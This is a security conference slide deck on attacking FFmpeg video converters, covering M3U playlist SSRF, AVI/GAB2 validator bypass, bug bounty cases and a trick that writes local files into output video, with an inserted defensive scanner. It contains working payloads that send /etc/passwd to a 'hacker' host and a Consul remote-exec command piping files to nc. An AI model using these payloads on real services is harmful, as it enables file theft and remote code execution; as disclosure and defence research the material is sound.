
Attacks on video converters: a year later
Emil Lerner, Pavel Cheremushkin (PHDays)
Who we are?

Emil Lerner
● MSU CMC postgraduate
● Bushwhackers CTF team
● uses emacs as IDE

Pavel Cheremushkin
● MSU CMC graduated bachelor ?
● Bushwhackers CTF team
● @__paulch on twitter
● uses vim as IDE
How a video service works
[diagram: FFmpeg]

Attack model
[diagram: FFmpeg (on target server)]
Previous work

● Maxim Andreev, Mail.Ru Meetup 2016
● “Viral Video” by Maxim Andreev & Nikolay Ermiskin, BlackHat USA 2016
M3U playlists

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://internal.host/api/method
#EXT-X-ENDLIST

“Viral Video”, BH USA 2016
M3U playlists: reading responses and files

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/prefix.m3u
#EXTINF:1.0,
file:///etc/passwd
#EXT-X-ENDLIST

prefix.m3u:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/read?

“Viral Video”, BH USA 2016

Segments concatenated:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/read?root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

“Viral Video”, BH USA 2016

Fixes

● proto limited to http:// and file://
● same protocol for segments and playlist
● nesting limited
Format validation
AVI GAB2 chunk: subtitles
AVI GAB2 chunk: not only subtitles
Format validation: bypass
file_for_upload.avi:

<AVI header+GAB2 header>
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/prefix.avi
#EXTINF:1.0,
<interesting url>
#EXTINF:1.0,
http://hacker/footer.avi
#EXT-X-ENDLIST
<AVI fake body + footer>

prefix.avi:

<AVI header+GAB2 header>
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/read?

segments concatenated:

<AVI header+GAB2 header>
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/read?<interesting data line 1>
<interesting data>
#EXT-X-ENDLIST
<AVI fake body + AVI footer>
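A defender-side check for the two points above, the playlist rules from the Fixes slide (allowed protocols, same protocol for segments as for the playlist, no local files) and the GAB2-in-AVI smuggling, added here as an example; it is not the authors' code and not FFmpeg's. It walks the RIFF chunks of an upload, pulls an M3U body out of any GAB2 subtitle chunk and reports URIs that break the policy; the policy itself and the GAB2 header bytes in the constructed sample are assumptions.

```python
import re
import struct

# Assumed policy (mirrors the Fixes slide): segment/key URIs only http(s), same
# scheme as the playlist itself, never a local file or data: URI.
ALLOWED = {"http", "https"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)

def check_playlist(text, parent="http"):
    """Return policy violations ('scheme: uri') for one HLS playlist body."""
    bad = []
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("#EXT-X-KEY"):          # the key URI gets fetched too
            m = re.search(r'URI="?([^",]+)', line)
            uri = m.group(1) if m else ""
        elif line.startswith("#") or not line:
            continue
        else:
            uri = line                              # segment URI
        m = SCHEME_RE.match(uri)                    # "/x" = file, relative inherits
        scheme = m.group(1).lower() if m else ("file" if uri.startswith("/") else parent)
        if scheme not in ALLOWED or scheme != parent:
            bad.append(f"{scheme}: {uri}")
    return bad

def iter_chunks(buf, pos=0, end=None, depth=0):  # yield (fourcc, data) of every RIFF chunk
    end = len(buf) if end is None else end
    while pos + 8 <= end:
        fourcc, size = buf[pos:pos + 4], struct.unpack_from("<I", buf, pos + 4)[0]
        if fourcc in (b"RIFF", b"LIST") and depth < 8:    # descend, bounded depth
            yield from iter_chunks(buf, pos + 12, min(end, pos + 8 + size), depth + 1)
        else:
            yield fourcc, buf[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)                       # chunks are padded to even size

def scan_avi(buf):  # [(fourcc, violations)] for GAB2 subtitle chunks hiding an M3U playlist
    out = []
    for fourcc, data in iter_chunks(buf):
        i = data.find(b"#EXTM3U") if data.startswith(b"GAB2") else -1
        if i >= 0:
            out.append((fourcc.decode("latin-1"), check_playlist(data[i:].decode("latin-1"))))
    return out

def chunk(fourcc, data):  # RIFF chunk: fourcc, LE size, data, pad byte if odd
    return fourcc + struct.pack("<I", len(data)) + data + b"\0" * (len(data) & 1)

# Constructed sample AVI: subtitle chunk "01tx" holds a GAB2 blob (header approximated) + the slide's playlist.
PLAYLIST = (b"#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:1\n#EXTINF:1.0,\nhttp://hacker/prefix.avi\n"
            b"#EXTINF:1.0,\nfile:///etc/passwd\n#EXT-X-ENDLIST\n")
SAMPLE_AVI = chunk(b"RIFF", b"AVI " + chunk(b"LIST", b"hdrl" + chunk(b"avih", b"\0" * 56))
                   + chunk(b"LIST", b"movi" + chunk(b"01tx", b"GAB2\x00\x02\x00" + b"\0" * 8 + PLAYLIST)))
```

Note that the http://hacker/prefix.avi segment passes the scheme policy on its own; what makes the sample reject-worthy is that a subtitle chunk contains a playlist at all, which scan_avi reports even when the violation list is empty.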
Bug bounty story #1 (imgur.com)

● M3U and SSRF works
● response read (via M3U inside AVI) works too
● hosted on AWS
● AWS keys from metadata api didn’t work :(
● http://169.254.169.254/latest/user-data mentions “Consul”
Bug bounty story #1 (imgur.com): Consul

/v1/agent/self HTTP/1.1
Connection: Keep-Alive

PUT /v1/kv/_rexec/<CONSUL_SESSION_ID>/job HTTP/1.1
Content-Length: 86

{"Wait": 2000000000, "Command": "cat /etc/passwd | nc <BACKCONNECT_IP> 31337"}PUT /v1/event/fire/_rexec HTTP/1.1
Content-Length: 71

{"Prefix": "_rexec", "Session": "<CONSUL_SESSION_ID>"}


Bug bounty story #1 (imgur.com): Consul
(the same request, URL-encoded into a single URL starting with http://127.0.0.1:8500/v1/agent/self)
Bug bounty story #1 (imgur.com): RCE
Binary vuln. vs Logical vuln.
Fuzzing FFmpeg

● Google Research “FFmpeg and a thousand fixes” by Mateusz Jurczyk and Gynvael Coldwind
● oss-fuzz by Google
● Open Broadcast Systems
● ...

$ git log | egrep -c 'Jurczyk|Coldwind'
1372
FFmpeg Workflow
Fuzzing network code

● hook network functions (connect, send/recv)
● known & popular approach
● tools exist (e.g. preeny)
Problems of real-life remote exploitation

It’s easy because…
● A lot of ROP gadgets
● A lot of functions in @plt
● Choose your own exploitation method!
● Command line params
● ...

It’s hard because…
● No binary knowledge
● No system knowledge (ASLR, libc version, etc.)
● Can’t debug remote exploit
HTTP Exploit (CVE-2016-10190)

function@plt(arg1, arg2, arg3);

RTMP Exploit (CVE-2016-10191)
Bug bounty story #2 (flickr.com)

● format validator bypassed via M3U AVI
● old FFmpeg version
● can read local files and fire SSRF requests

file_for_upload.avi:

<AVI header+GAB2 header>
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/prefix.avi
#EXTINF:1.0,
file:///proc/self/exe
#EXTINF:1.0,
http://hacker/footer.avi
#EXT-X-ENDLIST
<AVI fake body + footer>

prefix.avi:

<AVI header+GAB2 header>
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/read?
file_for_upload.avi:

...
#EXTINF:1.0,
#EXT-X-BYTERANGE: <size>@<offset>
file:///proc/self/exe
...

can’t read 0x00, 0x0a, 0x0d

...
#EXTINF:1.0,
#EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key"
file:///proc/self/exe
...

read approx. 5 full blocks

...
#EXTINF:1.0,
#EXT-X-BYTERANGE: 1000@<offset>
#EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key2"
file:///proc/self/exe
...

read full data

Bug bounty story #2 (flickr.com)

1. dump /proc/self/exe
2. adjust ropchains
3. fire rtmp:// request
Cool, but what if there’s no network?
Dump files directly to the video!

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
data:<format-header>
#EXTINF:1.0,
file:///etc/passwd
#EXTINF:1.0,
data:<format-footer>
#EXT-X-ENDLIST
...
#EXTINF:1,
#EXT-X-KEY:METHOD=AES-128, URI=/dev/zero
#EXT-X-BYTERANGE: 16
/dev/zero
...

= AES⁻¹_{0x00…00}(0x00…00) = CONST

...
#EXTINF:1,
#EXT-X-KEY:METHOD=AES-128, URI=/dev/zero, IV=<VAL>
#EXT-X-BYTERANGE: 16
/dev/zero
...

= AES⁻¹_{0x00…00}(0x00…00) ⊕ <VAL> = <FMT HEADER>

XBIN format

● ancient
● can draw symbols
● header length ≤ 16 bytes
AVI
  GAB2
    M3U
      XBIN (via AES): XBIN header | /etc/passwd | XBIN footer
Bug bounty story #3 (Vk.com, tumblr, flickr again, …)
Bug bounty story #3: even Google!
Takeaways (for defender)

● FFmpeg must be sandboxed
  ○ there is no other way
  ○ don’t even ask

“FFmpeg is one of those projects we trust to have RCE everywhere”

Google security team


Takeaways (for hacker)

● video processing = $$$
  our bounties ~ 25k$

https://github.com/neex/ffmpeg-avi-m3u-xbin
Thank you!